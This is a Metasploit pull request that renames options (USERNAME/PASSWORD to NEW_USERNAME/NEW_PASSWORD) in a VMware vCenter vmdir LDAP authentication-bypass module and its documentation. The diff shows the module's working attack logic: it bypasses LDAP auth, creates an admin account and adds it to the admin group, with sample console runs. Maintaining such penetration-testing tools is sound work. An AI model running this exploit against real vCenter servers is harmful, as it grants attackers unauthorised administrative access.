### PR TITLE
corrected options confict between module and ldap mixin

### DIFF
--- a/documentation/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.md
+++ b/documentation/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.md
@@ -32,21 +32,21 @@ Add an admin user to the vCenter Server.
 If you already have the LDAP base DN, you may set it in this option.
 `dc=vsphere,dc=local` will be used if not set.
 
-### BIND_DN
+### USERNAME
 
 If you already have a password to authenticate to the LDAP server (see
-BIND_PW), this option let you setup the bind username in DN format (e.g
+USERNAME), this option let you setup the bind username in DN format (e.g
 `cn=1.2.3.4,ou=Domain Controllers,dc=vsphere,dc=local`).
 
-### BIND_PW
+### PASSWORD
 
 The password to authenticate to the LDAP server, if you have it.
 
-### USERNAME
+### NEW_USERNAME
 
 Set this to the username for the new admin user.
 
-### PASSWORD
+### NEW_PASSWORD
 
 Set this to the password for the new admin user.
 
@@ -63,11 +63,11 @@ Module options (auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass):
    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    BASE_DN                    no        LDAP base DN if you already have it
-   PASSWORD                   no        Password of admin user to add
+   NEW_PASSWORD               no        Password of admin user to add
    RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
    RPORT     636              yes       The target port
    SSL       true             no        Enable SSL on the LDAP connection
-   USERNAME                   no        Username of admin user to add
+   NEW_USERNAME               no        Username of admin user to add
 
 
 Auxiliary action:
@@ -79,10 +79,10 @@ Auxiliary action:
 
 msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set rhosts [redacted]
 rhosts => [redacted]
-msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set username msfadmin
-username => msfadmin
-msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set password msfadmin
-password => msfadmin
+msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set new_username msfadmin
+new_username => msfadmin
+msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set new_password msfadmin
+new_password => msfadmin
 msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > run
 [*] Running module against [redacted]
 not verifying SSL hostname of LDAPS server '[redacted]:636'
@@ -140,15 +140,15 @@ Module options (auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass):
    Name      Current Setting                         Required  Description
    ----      ---------------                         --------  -----------
    BASE_DN   dc=vsphere,dc=local                     no        LDAP base DN if you already have it
-   BIND_DN   cn=192.168.3.32,ou=Domain Controlle     no        The username to authenticate to LDAP server
+   USERNAME  cn=192.168.3.32,ou=Domain Controlle     no        The username to authenticate to LDAP server
              rs,dc=vsphere,dc=local
-   BIND_PW   #$F4!4SeV\BL~L2gb(oa                    no        Password for the BIND_DN
-   PASSWORD  NewPassword123#                         no        Password of admin user to add
+   PASSWORD  #$F4!4SeV\BL~L2gb(oa                    no        Password for the BIND_DN
+   NEW_PASSWORD  NewPassword123#                     no        Password of admin user to add
    RHOSTS    192.168.3.32                            yes       The target host(s), see https://github.com/rapid7/metasploit-framework
                                                                /wiki/Using-Metasploit
    RPORT     636                                     yes       The target port
    SSL       true                                    no        Enable SSL on the LDAP connection
-   USERNAME  MsfAdmin                                no        Username of admin user to add
+   NEW_USERNAME  MsfAdmin                            no        Username of admin user to add
 
 
 Auxiliary action:

--- a/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.rb
+++ b/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.rb
@@ -55,17 +55,17 @@ class MetasploitModule < Msf::Auxiliary
     register_options([
       Opt::RPORT(636), # SSL/TLS
       OptString.new('BASE_DN', [false, 'LDAP base DN if you already have it']),
-      OptString.new('USERNAME', [false, 'Username of admin user to add']),
-      OptString.new('PASSWORD', [false, 'Password of admin user to add'])
+      OptString.new('NEW_USERNAME', [false, 'Username of admin user to add']),
+      OptString.new('NEW_PASSWORD', [false, 'Password of admin user to add'])
     ])
   end
 
-  def username
-    datastore['USERNAME']
+  def new_username
+    datastore['NEW_USERNAME']
   end
 
-  def password
-    datastore['PASSWORD']
+  def new_password
+    datastore['NEW_PASSWORD']
   end
 
   def base_dn
@@ -73,7 +73,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def user_dn
-    "cn=#{username},cn=Users,#{base_dn}"
+    "cn=#{new_username},cn=Users,#{base_dn}"
   end
 
   def group_dn
@@ -81,7 +81,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    unless username && password
+    unless new_username && new_password
       print_error('Please set the USERNAME and PASSWORD options to proceed')
       return
     end
@@ -102,10 +102,10 @@ class MetasploitModule < Msf::Auxiliary
       print_status("Bypassing LDAP auth in vmdir service at #{peer}")
       auth_bypass(ldap)
 
-      print_status("Adding admin user #{username} with password #{password}")
+      print_status("Adding admin user #{new_username} with password #{new_password}")
 
       unless add_admin(ldap)
-        print_error("Failed to add admin user #{username}")
+        print_error("Failed to add admin user #{new_username}")
       end
     end
   rescue Net::LDAP::Error => e
@@ -128,13 +128,13 @@ class MetasploitModule < Msf::Auxiliary
   def add_admin(ldap)
     user_info = {
       'objectClass' => %w[top person organizationalPerson user],
-      'cn' => username,
+      'cn' => new_username,
       'sn' => 'vsphere.local',
-      'givenName' => username,
-      'sAMAccountName' => username,
-      'userPrincipalName' => "#{username}@VSPHERE.LOCAL",
-      'uid' => username,
-      'userPassword' => password
+      'givenName' => new_username,
+      'sAMAccountName' => new_username,
+      'userPrincipalName' => "#{new_username}@VSPHERE.LOCAL",
+      'uid' => new_username,
+      'userPassword' => new_password
     }
 
     # Add our new user
@@ -145,9 +145,9 @@ class MetasploitModule < Msf::Auxiliary
       when Net::LDAP::ResultCodeInsufficientAccessRights
         print_error('Failed to bypass LDAP auth in vmdir service')
       when Net::LDAP::ResultCodeEntryAlreadyExists
-        print_error("User #{username} already exists")
+        print_error("User #{new_username} already exists")
       when Net::LDAP::ResultCodeConstraintViolation
-        print_error("Password #{password} does not meet policy requirements")
+        print_error("Password #{new_password} does not meet policy requirements")
       else
         print_error("#{res.message}: #{res.error_message}")
       end
@@ -155,14 +155,14 @@ class MetasploitModule < Msf::Auxiliary
       return false
     end
 
-    print_good("Added user #{username}, so auth bypass was successful!")
+    print_good("Added user #{new_username}, so auth bypass was successful!")
 
     # Add our user to the admin group
     unless ldap.add_attribute(group_dn, 'member', user_dn)
       res = ldap.get_operation_result
 
       if res.code == Net::LDAP::ResultCodeAttributeOrValueExists
-        print_error("User #{username} is already an admin")
+        print_error("User #{new_username} is already an admin")
       else
         print_error("#{res.message}: #{res.error_message}")
       end
@@ -170,7 +170,7 @@ class MetasploitModule < Msf::Auxiliary
       return false
     end
 
-    print_good("Added user #{username} to admin group")
+    print_good("Added user #{new_username} to admin group")
 
     true
   end

--- a/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.rb
+++ b/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.rb
@@ -82,7 +82,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def run
     unless new_username && new_password
-      print_error('Please set the USERNAME and PASSWORD options to proceed')
+      print_error('Please set the NEW_USERNAME and NEW_PASSWORD options to proceed')
       return
     end
 
@@ -116,7 +116,7 @@ class MetasploitModule < Msf::Auxiliary
   def auth_bypass(ldap)
     # when datastore['BIND_DN'] has been provided in options,
     # ldap_connect has already made a bind for us.
-    return if datastore['BIND_DN']
+    return if datastore['USERNAME'] && ldap.bind
 
     ldap.bind(
       method: :simple,


### PR DESCRIPTION
This PR corrects an Option conflict between `Msf::Exploit::Remote::LDAP` and `auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass` module. As reported in #18091 

It seems around this commit [9a6c298](https://github.com/rapid7/metasploit-framework/commit/9a6c298a43bca37d9d582ad4dc4ba5e8afc29474) the `BIND_DB` and `BIND_PW` options of `lib/msf/core/exploit/remote/ldap.rb` started to move towards renaming into `USERNAME` and `PASSWORD`. Unfortunately same options have been used in `auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass` module for a different purpose.

This PR adds a prefix `NEW_` to the `auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass` module options

## Verification

I don't have a test system on hand at the moment, I appreciate if someone tests both scenarios:

1) https://github.com/HynekPetrak/metasploit-framework/blob/fix_vmware_vcenter_vmdir_auth_bypass/documentation/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.md#vmware-vcenter-server-67-virtual-appliance-on-esxi-vulnerable-target

2) https://github.com/HynekPetrak/metasploit-framework/blob/fix_vmware_vcenter_vmdir_auth_bypass/documentation/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.md#vmware-vcenter-server-6702-virtual-appliance-on-esxi-not-vulnerable-target
